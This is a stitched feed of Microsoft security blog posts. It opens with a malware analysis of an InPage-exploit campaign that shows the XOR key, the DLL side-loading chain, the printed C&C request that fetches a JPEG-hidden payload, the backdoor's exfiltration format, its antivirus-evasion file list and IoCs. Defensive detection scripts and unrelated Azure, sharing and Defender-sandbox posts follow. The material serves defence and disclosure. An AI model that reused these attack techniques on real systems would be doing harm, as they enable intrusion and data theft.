Office 365 ATP leverages massive threat intelligence from different data sources and integrates signals from multiple services such as Windows Defender ATP and Azure ATP. For example, Windows Defender Antivirus detects the malicious files and documents used in this attack. Additionally, endpoint detection and response (EDR) capabilities in Windows Defender ATP detect the DLL side-loading and malicious behavior observed in this attack. Through the integration of Office 365 ATP and the rest of Microsoft security technologies in Microsoft Threat Protection, detection and remediation are orchestrated across our solutions.

Entry point: Malicious InPage document

An email with a malicious InPage lure document attached was sent to select targets. The document exploits CVE-2017-12842, a vulnerability in InPage that allows arbitrary code execution. When the malicious InPage document is opened, it executes shellcode that decrypts and executes an embedded malicious DLL file. The decryption routine is a simple XOR function that uses the decryption key “27729984h”.

Figure 3. First DLL decryption function

Stage 1: DLL side-loading and C&C communication

The decrypted malicious DLL contains two files embedded in its PE resources section. The first resource, named 200, is a legitimate copy of the VLC media player (Product Version:, File Version: 2.2.1). The second resource, named 400, is a DLL hijacker that impersonates the legitimate file Libvlc.dll.

When run, the stage 1 malware drops both the VLC media player executable and the malicious Libvlc.dll into the %TEMP% folder, and then runs the VLC media player process.

The vulnerable VLC media player process searches for the dropped file Libvlc.dll in the directory from which it was loaded. It subsequently picks up and loads the malicious DLL and executes its malicious function.
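A detection for the side-loading pattern just described, added here as an example rather than taken from the report: it scans image-load events and flags a DLL that carries the name of a library the host program resolves from its own directory (Libvlc.dll) when both files were loaded from a user-writable location such as %TEMP%. The event format, the file paths and the signature flag are constructed for the example.

```python
"""Flag the DLL side-loading pattern described above: a legitimate program
(vlc.exe) loading a DLL that bears the name of one of its own libraries
(Libvlc.dll) from the user-writable directory both were dropped into.

Added example: the event format, paths and signature flag are constructed."""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

# Library names that the host program resolves from its own directory and
# that were abused in the attack above (extend with other known pairs).
SIDELOAD_NAMES = {"libvlc.dll"}

# Directory fragments that a legitimate install would not run from.
USER_WRITABLE_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\",
                      "\\programdata\\", "\\users\\public\\")


@dataclass
class ImageLoad:
    process: str   # full path of the process that loaded the module
    module: str    # full path of the loaded DLL
    signed: bool   # whether the DLL carried a valid Authenticode signature


# Constructed image-load events in a flat key=value format.
SAMPLE_EVENTS = [
    r"image=C:\Program Files\VideoLAN\VLC\vlc.exe "
    r"module=C:\Program Files\VideoLAN\VLC\libvlc.dll signed=true",
    r"image=C:\Users\bob\AppData\Local\Temp\vlc.exe "
    r"module=C:\Users\bob\AppData\Local\Temp\Libvlc.dll signed=false",
    r"image=C:\Windows\explorer.exe "
    r"module=C:\Windows\System32\shell32.dll signed=true",
]

_EVENT_RE = re.compile(
    r"image=(?P<image>.+?) module=(?P<module>.+?) signed=(?P<signed>true|false)$")


def parse_event(line: str) -> Optional[ImageLoad]:
    """Parse one constructed event line; return None for lines that do not match."""
    m = _EVENT_RE.match(line.strip())
    if not m:
        return None
    return ImageLoad(m["image"], m["module"], m["signed"] == "true")


def is_sideload(ev: ImageLoad) -> bool:
    """True when a watched library name is loaded from the process's own
    directory and that directory is user-writable or the DLL is unsigned."""
    if ntpath.basename(ev.module).lower() not in SIDELOAD_NAMES:
        return False
    proc_dir = ntpath.dirname(ev.process).lower() + "\\"
    mod_dir = ntpath.dirname(ev.module).lower() + "\\"
    if proc_dir != mod_dir:
        return False          # resolved from elsewhere; not the pattern here
    in_writable = any(frag in mod_dir for frag in USER_WRITABLE_DIRS)
    return in_writable or not ev.signed


def find_sideloads(lines: List[str]) -> List[str]:
    """Return the module paths of all events matching the side-loading pattern."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is not None and is_sideload(ev):
            hits.append(ev.module)
    return hits


if __name__ == "__main__":
    for path in find_sideloads(SAMPLE_EVENTS):
        print("possible DLL side-loading:", path)
```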

Figure 4. Functions exported by the malicious Libvlc.dll

Figure 5. Functions imported from Libvlc.dll by the VLC media player process

The most interesting malicious code in Libvlc.dll is in the function libvlc_wait(). The malicious code dynamically resolves the API calls to connect to the attacker C&C server and download a JPEG file. If the C&C server is not reachable, the malware calls the API sleep() for five seconds and attempts to call back the attacker domain again.

Figure 6. C&C callback in malicious function libvlc_wait()

If the JPEG file, logo.jpg, is successfully downloaded, the malicious code in libvlc_wait() skips the first 20 bytes of the JPEG file and creates a thread to execute the embedded payload. The code in JPEG file is encoded using Shikata ga nai, a custom polymorphic shellcode encoder/decoder.

Below is an example of the HTTP request sent to the C&C server to download the malicious file logo.jpg.

GET /assets/vnc/logo.jpg HTTP/1.1
Accept: */*

HTTP/1.1 200 OK
Date: Mon, 09 Jul 2018 13:45:49 GMT
Server: Apache/2.4.33 (cPanel) OpenSSL/1.0.2o mod_bwlimited/1.4 Phusion_Passenger/5.1.12
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Mon, 09 Apr 2018 07:19:20 GMT
ETag: "26e0378-2086b-56965397b5c31"
Accept-Ranges: bytes
Content-Length: 133227
Content-Type: image/jpeg

Figure 7. HTTP GET Request embedded in the JPEG File

The historical Whois record indicated that the C&C server was registered on March 20, 2018.

Domain Name:
Registry Domain ID: D2169366F46A14BCD9EB42AF48BEA813C-NSR
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2018-03-20T14:04:40Z
Creation Date: 2018-03-20T14:04:40Z
Registry Expiry Date: 2019-03-20T14:04:40Z
Domain Status: clientTransferProhibited
Domain Status: addPeriod

Figure 8. Whois record for the attacker C&C server.

The shellcode in the JPEG file uses multiple layers of polymorphic XOR routines to decrypt the final payload. After successfully decrypting the payload, it drops and executes the final DLL malware aflup64.dll in the folder %ProgramData%\Dell64.

Figure 9. The first 29 bytes of the JPEG file after the header make up the first decryption layer

Figure 10. Valid JPEG file header followed by encrypted malicious code
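A structural check for the JPEG carrier described above (a valid 20-byte JFIF header followed by non-image data), added here as an example and not part of the report: it walks the JPEG marker chain and reports the offset at which the chain breaks, which is what a proxy or sandbox can run over any response served as image/jpeg. Both sample files are constructed; the real logo.jpg is not reproduced.

```python
"""Tell a real JPEG from a JPEG-looking carrier by walking its marker chain.
A real image runs SOI -> segments -> EOI; the carrier described above has a
valid 20-byte JFIF header followed by data that is not JPEG at all.

Added example: both sample files are constructed; the real logo.jpg is not
reproduced here."""
from typing import Optional, Tuple

# Minimal JFIF header: SOI plus a 16-byte APP0 segment, 20 bytes in total,
# which is exactly the prefix the malicious libvlc_wait() skips.
JFIF_HEADER = bytes.fromhex(
    "ffd8"          # SOI
    "ffe0" "0010"   # APP0, segment length 16 (includes the length field)
    "4a46494600"    # "JFIF\0"
    "0101" "00"     # version 1.1, density units: none
    "0001" "0001"   # X and Y density
    "0000"          # no thumbnail
)


def walk_jpeg(data: bytes) -> Tuple[bool, int, str]:
    """Return (ok, offset, reason). ok is True only if the chain reaches EOI;
    otherwise offset is where the structure breaks."""
    if data[:2] != b"\xff\xd8":
        return False, 0, "missing SOI"
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            return False, pos, "expected marker 0xFF, found 0x%02x" % data[pos]
        while pos < len(data) and data[pos] == 0xFF:   # 0xFF fill bytes
            pos += 1
        if pos >= len(data):
            return False, pos, "truncated marker"
        marker = data[pos]
        pos += 1
        if marker == 0xD9:                              # EOI
            return True, pos, "EOI reached"
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            continue                                    # standalone markers
        if pos + 2 > len(data):
            return False, pos, "truncated segment length"
        seg_len = int.from_bytes(data[pos:pos + 2], "big")
        if seg_len < 2 or pos + seg_len > len(data):
            return False, pos, "bad segment length %d" % seg_len
        pos += seg_len
        if marker == 0xDA:                              # SOS: skip scan data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break                               # next real marker
                pos += 1
    return False, pos, "EOI missing"


def classify(data: bytes) -> Tuple[str, Optional[int]]:
    """'image' for a clean file; 'trailing-data' with the EOI offset when bytes
    follow EOI; 'malformed' with the offset at which the marker chain breaks."""
    ok, offset, _ = walk_jpeg(data)
    if ok:
        return ("image", None) if offset == len(data) else ("trailing-data", offset)
    return ("malformed", offset)


# Constructed samples: a structurally clean image and a carrier whose body
# (a stand-in for the encoded shellcode) starts right after the 20-byte header.
CLEAN_SAMPLE = JFIF_HEADER + b"\xff\xd9"
CARRIER_SAMPLE = JFIF_HEADER + bytes((i * 37 + 11) & 0xFF for i in range(64))

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_SAMPLE), ("carrier", CARRIER_SAMPLE)):
        print(name, classify(blob), walk_jpeg(blob)[2])
```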

Stage 2: System reconnaissance and executing attacker commands

The final stage malware maintains persistence using different methods. For example, the malicious function IntRun() can load and execute the malware DLL. It also uses the registry key CurrentVersion\Run to maintain persistence.

The malware's capabilities include:

  • System reconnaissance

    • List computer names, Windows version, Machine ID, running processes, and loaded modules
    • List system files and directories
    • List network configuration

  • Execute attacker commands
  • Evade certain sandboxes or antivirus products

Collected information or responses to commands are sent back to the attacker domain via an HTTP POST request. The request has a custom header that always starts with 37 hardcoded alphanumeric characters.

Content-Disposition: form-data; name="id";
Content-Type: text/plain
<Base64 Data Blob>

Figure 11. Sample of malware POST request

The malware also has a list of hardcoded file names of security products and sandbox solutions. If any of these files are present on a machine the malware attempts to infect, it exits:

  • avgnt.exe
  • avp.exe
  • egui.exe
  • Sbie.dll
  • VxKernelSvcNT.log

Detecting targeted attacks with Office 365 ATP and Windows Defender ATP

Historically, malware payloads like the stage 2 malware in this attack are used to steal credentials and other sensitive information, install more payloads, or move laterally in the network. However, because the malware opens a backdoor channel for remote attackers to execute arbitrary commands of their choice, there's a wide range of possibilities.

Enterprises can protect themselves from targeted attacks using Office 365 Advanced Threat Protection, which blocks threats based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging sandboxing and time-of-click protection. Recent enhancements in anti-phishing capabilities in Office 365 address impersonation, spoof, phishing content, and internal phishing emails sent from compromised accounts. If you are not already secured against advanced cyberthreat campaigns via email, begin a free Office 365 E5 trial today.

In addition, enterprises can use Windows Defender Advanced Threat Protection, which provides a unified endpoint security platform for intelligent protection, detection, investigation, and response. Exploit protection, attack surface reduction rules, hardware-based isolation, controlled folder access, and network protection reduce the attack surface. Windows Defender Antivirus detects and blocks the malicious documents and files used in this campaign. Windows Defender ATP's endpoint detection and response, automated investigation and remediation, and advanced hunting capabilities empower security operations personnel to detect and stop attacks in enterprise networks. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.

These two services integrate with the rest of Microsoft's security technologies as part of Microsoft Threat Protection, an integrated solution providing security for the modern workplace across identities, endpoints, user data, cloud apps, and infrastructure. Cybersecurity is the central challenge of our digital age, and Microsoft doesn't stop innovating to provide industry-best integrated security. For more information, read the blog post Delivering security innovation that puts Microsoft's experience to work for you.




Ahmed Shosha and Abhijeet Hatekar
Microsoft Threat Intelligence Center

Indicators of Compromise (IoCs)

Files (SHA-256)
013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852 (INP file)
9ffb61f1360595fc707053620f3751cb76c83e67835a915ccd3cbff13cf97bed (EXE)
019b8a0d3f9c9c07103f82599294688b927fbbbdec7f55d853106e52cf492c2b (DLL)

The post Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets appeared first on Microsoft Secure.

CISO series: Build in security from the ground up with Azure enterprise

November 1st, 2018

As an executive security advisor at Microsoft and a former CISO, I meet with other CISOs every week to discuss cybersecurity, cloud architecture, and sometimes everything under the sun regarding technology. During these discussions with CISOs and other senior security executives of large enterprises who are in the beginning stages of a cloud migration, I find they're excited about the increased flexibility of Microsoft Azure services and the consumption-based model it offers their business units. Regardless of where they are in the journey, they also have some concerns. For example, they need to figure out how to enforce security policies when IT no longer serves as the hub for services and applications.

Specifically, they come to me with the following three questions:

  1. We are interested in Microsoft and already have many of your security solutions. How do these tools translate to a hybrid-cloud solution and where do we start?
  2. Security impacts many parts of the organization outside of the security team. Who do we need to bring to the table across the organization for this to be a successful migration to a secure cloud?
  3. Can we create a roadmap or strategy to guide our journey to the cloud?

It really comes down to balancing agility with governance. Many of my customers have found that the Azure enterprise scaffold and Azure Blueprints (now in preview) can help them balance these two critical priorities. I hope my suggestions and insight help you to understand how to use these tools to smooth your cloud migration.

Establish a flexible hierarchy as the baseline for governance

Scaffolding and blueprints are concepts borrowed from the construction industry. When a construction crew builds a large, complex, and time-consuming project they refer to blueprints and erect scaffolding. Together these tools simplify the process and provide guardrails to guide the builder. You can think of the Azure enterprise scaffold and Azure Blueprints in the same way.

  • Scaffolding is a flexible framework that applies structure and anchors for services and workloads built on Azure. It is a layered process designed to ensure workloads meet the minimum governance requirements of your organization while enabling business groups and developers to quickly meet their own goals.
  • Blueprints are common cloud architecture examples that you can customize for your needs.

Customers find the Azure enterprise scaffold valuable because it can be personalized to the needs of the company for billing, resource management, and resource access. It is grounded in a hierarchy that gives you a structure for subdividing the environment into up to four nested layers to match your organization’s structure:

Enterprise enrollment: The biggest unit of the hierarchy. Enterprise enrollment defines the specifics of your contracted cloud services.

Departments: Within the enterprise agreement are departments, which can be broken down according to what works best for your organization. Three of the most popular patterns are by function (human resources, information technology, marketing), by business unit (auto, aerospace), and by geography (North America, Europe).

Subscriptions: Within departments are accounts and then subscriptions. Subscriptions can represent an application, the lifecycle of a service (such as production and non-production), or the departments in your organization.

Resource groups: Nested in subscriptions are resource groups, which allow you to put resources into meaningful groups for management, billing, or natural affinity. This hierarchy serves as the foundation for the security policies and processes that you will layer on next.

Safeguard your identities and privileged access

When I talk with security executives about implementing security policies, we always start our discussion with identity. You can do the same by identifying who and what systems should have access to what resources, and how you want to control this access. Once you connect your Azure Active Directory (Azure AD) to your on-premises Active Directory (AD) using the AD Connect tool, you can use role-based access control (RBAC) to assign users to roles, such as owner, contributor, or others that you create. Don't forget to set up Multi-Factor Authentication (MFA) and adhere to the principle of granting the least privilege required to do the work. See Azure identity management best practices for more resources and security tips.

With your hierarchy established and resources assigned, you can use Azure Policy and Initiatives to define policies and apply them to subscriptions.

A couple examples of popular policies include:

  • Restrict specific resources to a geographical region to comply with country or region-specific regulations.
  • Prohibit certain resources, such as servers or data, from being deployed publicly.

Policies are a powerful tool that let you give business units access to the resources they need without exposing the enterprise to additional risk.

You will also need a plan for securing privileged accounts. I recommend creating a privileged access workstation when you start building out your security forest for administrators. Privileged access workstations provide a dedicated operating system for sensitive tasks that separates them from daily workstations and provide additional protection from phishing attacks and other vulnerabilities. With a good identity and access policy in place you have started down the path of trust but verify or building a zero-trust environment.

Gain greater visibility into the security of your entire environment

One big advantage of moving to the cloud is how much more visibility you get into the security of your environment versus on-premises. Azure offers several additional capabilities that allow you to protect your resources and detect threats. The Azure Security Center provides a unified view of the security status of resources across your environment. It includes advanced threat protection that uses artificial intelligence (AI) to detect incoming attacks and sends alerts in a way that's easy to digest. Security DevOps toolkits are a collection of scripts, tools, and automations that allow you to integrate security into native DevOps workflows. Azure update management ensures all your servers are patched with the latest updates.

Get started with Azure Blueprints

Using the scaffolding and blueprints framework can help you establish a secure foundation for your Azure environment by safeguarding identities, resources, networks, and data. I've touched on a few of the components, and you can dig into the nitty gritty in this article. When you're ready to get started, Azure Blueprints are available in preview. This capability will allow you to deploy the Azure enterprise scaffold model to your organization. Numerous organizations have used the blueprints and followed the scaffolding approach to successfully roll out their cloud strategy securely and faster than they expected.

As a final note of consideration as you work through your organization's cloud/security strategy, make sure you have all the stakeholders in the room. Many times, there are other parts of the organization that own security controls but are outside of the security organization. These might include operations, legal, human resources, information technology, and others. These stakeholders should be brought into the scaffolding and blueprint discussions, so they understand their roles and responsibilities as well as provide input.

If you want to discuss this further or need assistance, please reach out to your Microsoft account team.

The post CISO series: Build in security from the ground up with Azure enterprise appeared first on Microsoft Secure.


How to share content easily and securely

October 31st, 2018

This is the seventh post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Image taken at the Microsoft Ignite Conference.

Cumbersome restrictions and limitations on mobile devices, apps, and remote access can be taxing from an IT perspective and frustrating for your employees. Your users need to be able to create, access, and share files from anywhere, and IT needs to ensure that these actions won't compromise your company's security.

Microsoft 365 offers security solutions that help secure your collaboration and productivity apps. That way your employees can connect and communicate wherever they are, using tools they are familiar with, as securely as if they were right at their desks.

How can I securely share documents outside my organization?

Classify documents based on content sensitivity

First, classify documents using Azure Information Protection (AIP). With AIP, you can configure policies to classify, label, and protect data based on its sensitivity. Data can be classified according to standards you define for content, context, and source. These classifications can then be applied automatically or manually, or you can prompt your employees to decide what classification to apply with in-product suggestions.

To classify documents using AIP, you must first configure your company's classification policy. Configure the policy by signing in to the Azure portal as an administrator and then selecting Azure Information Protection in the apps list. All AIP users start with a default policy that you can configure to suit your needs. Once you have created the policy that works best, publish your changes to deploy the policy to all managed apps and devices.

Use email to share files

Your employees can use email file attachments in Microsoft Outlook to share files. With Outlook, users can take files from their business or personal device, attach files to an email, and access a dedicated library where all group files are stored. If your employees need to send a sensitive message to external users, they can increase security by encrypting the message using Office 365 Message Encryption and the message recipient will decrypt the message using the Office 365 Message Encryption viewer.

Enable users to collaborate

To ensure that shared documents are only viewed by the right person, your users can share files with internal or external partners through OneDrive for Business and apply security features such as password protection and Multi-Factor Authentication.

Microsoft Teams, a chat-based workspace, enables teams to be more productive by giving them a single and secure location that brings together everything a team needs in one hub, including chats, meetings, calls, files, and tools. Azure Active Directory (Azure AD) conditional access policies can be configured to secure the data in Teams. You can deploy Teams through Microsoft System Center Configuration Manager (ConfigMgr) or Microsoft Intune.

Yammer helps your users improve engagement with everyone in your organization through social networking. Use the security features in Yammer to help protect sensitive organizational data. Yammer supports Azure AD single sign-on authentication, allows admins to set password policies, and provides admins with session management tools that let you see the devices users are signed in to. You can manage access and permissions in Yammer by setting up the Yammer network to comply with your organization's standards.

Identify risky applications and shadow IT

Microsoft Cloud App Security allows you to more securely share documents via third-party applications by identifying the cloud apps on your network. By gaining visibility into shadow IT, you can help protect your information using policies for data sharing and data loss prevention.

How can I work on documents across devices securely?

To work more securely across different devices you will need to manage your mobile devices and set app protection policies. You can use Intune to manage your users' mobile devices. To help prevent data loss, you will want to protect company data that is accessed from devices that you don't manage. You can apply Intune app protection policies that restrict access to company resources and keep company and personal data from getting intermingled. Company data can end up in locations like personal storage or be transferred to apps beyond your purview, resulting in data loss. App protection policies can be used to prevent company data from being saved to the local storage of an unmanaged device or moved to other apps that aren't protected by app protection policies.

Deployment tips from our experts

Enable security features in Office 365 apps: Office 365 apps like Outlook, OneDrive, Teams, and Yammer all come with built-in features that enable users to more securely share files and be productive. A few simple things you can do include:

Classify and share documents securely: Classify documents in AIP to track and control how information is used. Then share documents securely via third-party applications using Microsoft Cloud App Security to protect your information.

Prevent data loss on mobile devices: Manage mobile devices with Intune and through mobile device management. Then implement app-level controls with Intune app protection policies to help prevent data loss.

Plan for success with Microsoft FastTrack: FastTrack comes with your subscription at no additional charge. Whether you're planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Store and share files inside and outside your organization to work securely across organizational boundaries. You can find additional security resources on

Coming Soon! Using controls for security compliance will be the last installment of our Deploying intelligent scenarios series. In November, we will kick off a new series: Top 10 security deployment actions with Microsoft 365 Security.

More blog posts from this series:

The post How to share content easily and securely appeared first on Microsoft Secure.


Windows Defender Antivirus can now run in a sandbox

Windows Defender Antivirus has hit a new milestone: the built-in antivirus capabilities on Windows can now run within a sandbox. With this new development, Windows Defender Antivirus becomes the first complete antivirus solution to have this capability and continues to lead the industry in raising the bar for security.

Putting Windows Defender Antivirus in a restrictive process execution environment is a direct result of feedback that we received from the security industry and the research community. It was a complex undertaking: we had to carefully study the implications of such an enhancement on performance and functionality. More importantly, we had to identify high-risk areas and make sure that sandboxing did not adversely affect the level of security we have been providing.

While it was a tall order, we knew it was the right investment and the next step in our innovation journey. It is available to Windows Insiders today. We encourage researchers and partners to try and examine this feature and give us feedback, so we can fine-tune performance, functionality, and security before we make it broadly available.

Why sandbox? Why now?

From the beginning, we designed and built Windows Defender Antivirus to be resistant to attacks. In order to inspect the whole system for malicious content and artifacts, it runs with high privileges. This makes it a candidate for attacks.

Security researchers, both inside and outside of Microsoft, have previously identified ways that an attacker can take advantage of vulnerabilities in Windows Defender Antivirus's content parsers that could enable arbitrary code execution. While we haven't seen attacks in the wild actively targeting Windows Defender Antivirus, we take these reports seriously. We immediately fixed potential problems and ramped up our own research and testing to uncover and resolve other possible issues.

At the same time, we continued hardening Windows 10 in general against attacks. Hardware-based isolation, network protection, controlled folder access, exploit protection, and other technologies reduce the attack surface and increase attacker costs. Notably, escalation of privilege from a sandbox is so much more difficult on the latest versions of Windows 10. Furthermore, the integration of Windows Defender Antivirus and other Windows security technologies into Windows Defender ATP's unified endpoint security platform allows signal-sharing and orchestration of threat detection and remediation across components.

Running Windows Defender Antivirus in a sandbox ensures that in the unlikely event of a compromise, malicious actions are limited to the isolated environment, protecting the rest of the system from harm. This is part of Microsoft's continued investment to stay ahead of attackers through security innovations. Windows Defender Antivirus and the rest of the Windows Defender ATP stack now integrate with other security components of Microsoft 365 to form Microsoft Threat Protection. It's more important than ever to elevate security across the board, so this new enhancement in Windows Defender Antivirus couldn't come at a better time.

Implementing a sandbox for Windows Defender Antivirus

Modern antimalware products are required to inspect many inputs, for example, files on disk, streams of data in memory, and behavioral events in real time. Many of these capabilities require full access to the resources in question. The first major sandboxing effort was related to layering Windows Defender Antivirus's inspection capabilities into the components that absolutely must run with full privileges and the components that can be sandboxed. The goal for the sandboxed components was to ensure that they encompassed the highest risk functionality like scanning untrusted input, expanding containers, and so on. At the same time, we had to minimize the number of interactions between the two layers in order to avoid a substantial performance cost.

The ability to gradually deploy this feature was another important design goal. Because we would be enabling this on a wide range of hardware and software configurations, we aimed to have the ability at runtime to decide if and when the sandboxing is enabled. This means that the entire content scanning logic can work both in-proc and out-of-proc, and it can't make any assumptions about running with high privileges.

Performance is often the main concern raised around sandboxing, especially given that antimalware products are in many critical paths like synchronously inspecting file operations and processing and aggregating or matching large numbers of runtime events. To ensure that performance doesn't degrade, we had to minimize the number of interactions between the sandbox and the privileged process, and at the same time, only perform these interactions in key moments where their cost would not be significant, for example, when IO is being performed.

Windows Defender Antivirus makes an orchestrated effort to avoid unnecessary IO; for example, minimizing the amount of data read for every inspected file is paramount to maintaining good performance, especially on older hardware (rotational disks, remote resources). Thus, it was crucial to maintain a model where the sandbox can request data for inspection as needed, instead of being passed the entire content. An important note: passing handles to the sandbox (to avoid the cost of passing the actual content) isn't an option, because there are many scenarios, such as real-time inspection, AMSI, etc., where there's no sharable handle that can be used by the sandbox without granting significant privileges, which decreases the security.

Resource usage is another problem that required significant investment: both the privileged process and the sandbox process need access to signatures and other detection and remediation metadata. To avoid duplication and preserve strong security guarantees, that is, to avoid unsafe ways of sharing state or the significant runtime cost of passing data/content between the processes, we used a model where most protection data is hosted in memory-mapped files that are read-only at runtime. This means protection data can be mapped into multiple processes without any overhead.

Another significant concern around sandboxing is related to the inter-process communication mechanism to avoid potential problems like deadlocks and priority inversions. The communication should not introduce any potential bottlenecks, either by throttling the caller or by limiting the number of concurrent requests that can be processed. Moreover, the sandbox process shouldn’t trigger inspection operations by itself. All inspections should happen without triggering additional scans. This requires fully controlling the capabilities of the sandbox and ensuring that no unexpected operations can be triggered. Low-privilege AppContainers are the perfect way to implement strong guarantees because the capabilities-based model will allow fine-grained control on specifying what the sandbox process can do.

Lastly, a significant challenge from the security perspective is related to content remediation or disinfection. Given the sensitive nature of the action (it attempts to restore a binary to the original pre-infection content), we needed to ensure this happens with high privileges in order to mitigate cases in which the content process (sandbox) could be compromised and disinfection could be used to modify the detected binary in unexpected ways.

Once the sandboxing is enabled, customers will see a content process, MsMpEngCP.exe, running alongside the antimalware service, MsMpEng.exe.

The content processes, which run with low privileges, also aggressively leverage all available mitigation policies to reduce the attack surface. They enable modern exploit mitigation techniques such as Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG), and prevent those settings from being changed at runtime. They also disable Win32k system calls and all extensibility points, and enforce that only signed and trusted code is loaded. More mitigation policies will be introduced in the future, alongside other techniques that aim to reduce the risk of compromise even further, such as multiple sandbox processes with random assignment, more aggressive recycling of sandbox processes without a predictable schedule, runtime analysis of the sandbox behavior, and others.

How to enable sandboxing for Windows Defender Antivirus today

We’re in the process of gradually enabling this capability for Windows insiders and continuously analyzing feedback to refine the implementation.

Users can also force the sandboxing implementation to be enabled by setting a machine-wide environment variable (setx /M MP_FORCE_USE_SANDBOX 1) and restarting the machine. This is currently supported on Windows 10, version 1703 or later.
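As an added example (not part of the Microsoft post), the following PowerShell script checks the observable signs described above on a Windows 10 1709 or later machine: the machine-wide MP_FORCE_USE_SANDBOX variable, whether MsMpEngCP.exe is running beside MsMpEng.exe, and the runtime mitigation policies of each content process. It assumes an elevated session, the Get-ProcessMitigation -Id form, and the nested property names shown, which are taken from the Set-ProcessMitigation option names and may differ between builds.

```powershell
# Added check script (not Microsoft's code): reports whether the Windows Defender
# Antivirus content sandbox is active and which exploit mitigations the content
# process(es) run with. Requires Windows 10 1709+ (Get-ProcessMitigation) and an
# elevated session, since MsMpEngCP.exe runs in an AppContainer.

function Get-DefenderSandboxStatus {
    [CmdletBinding()]
    param()

    # 1. The opt-in variable from the post (setx /M MP_FORCE_USE_SANDBOX 1).
    #    Read at Machine scope; the current session's copy may be stale until reboot.
    $forced = [Environment]::GetEnvironmentVariable('MP_FORCE_USE_SANDBOX', 'Machine')

    # 2. The antimalware service and its low-privilege content process(es).
    $engine  = Get-Process -Name 'MsMpEng'   -ErrorAction SilentlyContinue
    $content = @(Get-Process -Name 'MsMpEngCP' -ErrorAction SilentlyContinue)

    # 3. Runtime mitigation policy of each content process. The post lists DEP, ASLR,
    #    CFG, Win32k syscall filtering, disabled extension points and signed-code-only
    #    loading; the property names below are assumed and may differ between builds.
    $mitigations = foreach ($p in $content) {
        $m = Get-ProcessMitigation -Id $p.Id -ErrorAction SilentlyContinue
        if ($null -eq $m) { continue }
        [pscustomobject]@{
            ProcessId               = $p.Id
            DEP                     = $m.DEP.Enable
            ASLRForceRelocate       = $m.ASLR.ForceRelocateImages
            CFG                     = $m.CFG.Enable
            Win32kSyscallsDisabled  = $m.SystemCall.DisableWin32kSystemCalls
            ExtensionPointsDisabled = $m.ExtensionPoint.DisableExtensionPoints
            MicrosoftSignedOnly     = $m.BinarySignature.MicrosoftSignedOnly
        }
    }

    [pscustomobject]@{
        ForceVariableSet    = ($forced -eq '1')
        EngineRunning       = ($null -ne $engine)
        ContentProcessCount = $content.Count
        SandboxActive       = ($content.Count -gt 0)
        ContentMitigations  = @($mitigations)
    }
}

$status = Get-DefenderSandboxStatus
$status | Select-Object ForceVariableSet, EngineRunning, ContentProcessCount, SandboxActive | Format-List
$status.ContentMitigations | Format-Table -AutoSize

# The variable alone does nothing until the machine has been restarted.
if ($status.ForceVariableSet -and -not $status.SandboxActive) {
    Write-Warning 'MP_FORCE_USE_SANDBOX is set but no MsMpEngCP.exe is running: restart the machine and confirm the build is version 1703 or later.'
}
```

A content process whose mitigation fields come back empty usually means the session was not elevated and the AppContainer process could not be opened, not that the mitigations are off.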

Looking ahead: Broader availability and continuous innovation

To implement sandboxing for Windows Defender Antivirus, we took a lot of inputs from the feedback, suggestions, and research from our peers in the industry. From the beginning, we saw this undertaking as the security industry and the research community coming together to elevate security. We now call on researchers to follow through, as we did, and give us feedback on the implementation.

Windows Defender Antivirus is on a path of continuous innovation. Our next-gen antivirus solution, which is powered by artificial intelligence and machine learning and delivered in real time via the cloud, is affirmed by independent testers, adoption in the enterprise, and customers protected every day from malware campaigns big and small. We're excited to roll out this latest enhancement to the rest of our customers.

And we are committed to continue innovating. We're already working on new anti-tampering defenses for Windows Defender Antivirus. This will further harden our antivirus solution against adversaries. You'll hear about these new efforts soon. Windows Defender Antivirus and the rest of the Windows Defender Advanced Threat Protection platform will continue to advance and keep on leading the industry in raising the bar for security.



Mady Marinescu
Windows Defender Engineering team
with Eric Avena
Content Experience team




The post Windows Defender Antivirus can now run in a sandbox appeared first on Microsoft Secure.

CISO series: Partnering with the C-Suite on cybersecurity

October 24th, 2018 No comments

In my last blog, we looked at five communication techniques that can help engage business managers in the work of cybersecurity. This week, we'll look at how to use those techniques to bring the C-Suite into the conversation.

Not too long ago, I was speaking with the CIO of a large company (some details have been changed to protect the innocent) about one of my favorite topics: how to define security policies that balance user productivity and business risk. Before long, the CIO said, "Trust me, I know all about that." I stopped talking and started listening. He proceeded to tell me about an incident from a previous November. Apparently, during a small window between meetings, he decided to take advantage of the free time to do some online holiday shopping. We're all crushed for time, he knew exactly what he wanted, it took just a few minutes, and then he was off to his meeting. Only he didn't make it very far before the head of security approached to report a security policy violation. "Can you believe it?" the CIO said. "My online shopping was flagged!" I had a feeling I knew where this story was going. "I got flagged for violating my own policy!" he said.

The CIO then explained, "It was the middle of summer, and we had just had a small security scare. At the time, the only thing I cared about was doing everything in our power to prevent a bigger incident from happening. By the time the holidays rolled around, I'd forgotten all about it." To balance employee productivity, satisfaction, and corporate risk, the company decided to allow access to a few selected shopping sites during November and December.

His story got me thinking. Could the company have established a more flexible policy back in the summer if the policy team had properly explained the pros and cons of the restrictive "no shopping ever" policy? Maybe. There is no way to know definitively. One thing's for sure: the experience itself clearly made an impression on the CIO. I'm a big believer in learning through experience, but since we can't learn every lesson by living through it, there are opportunities to have productive conversations with executives that can increase engagement and mitigate these sorts of issues.

Five communication strategies for engaging executives and the C-Suite with security

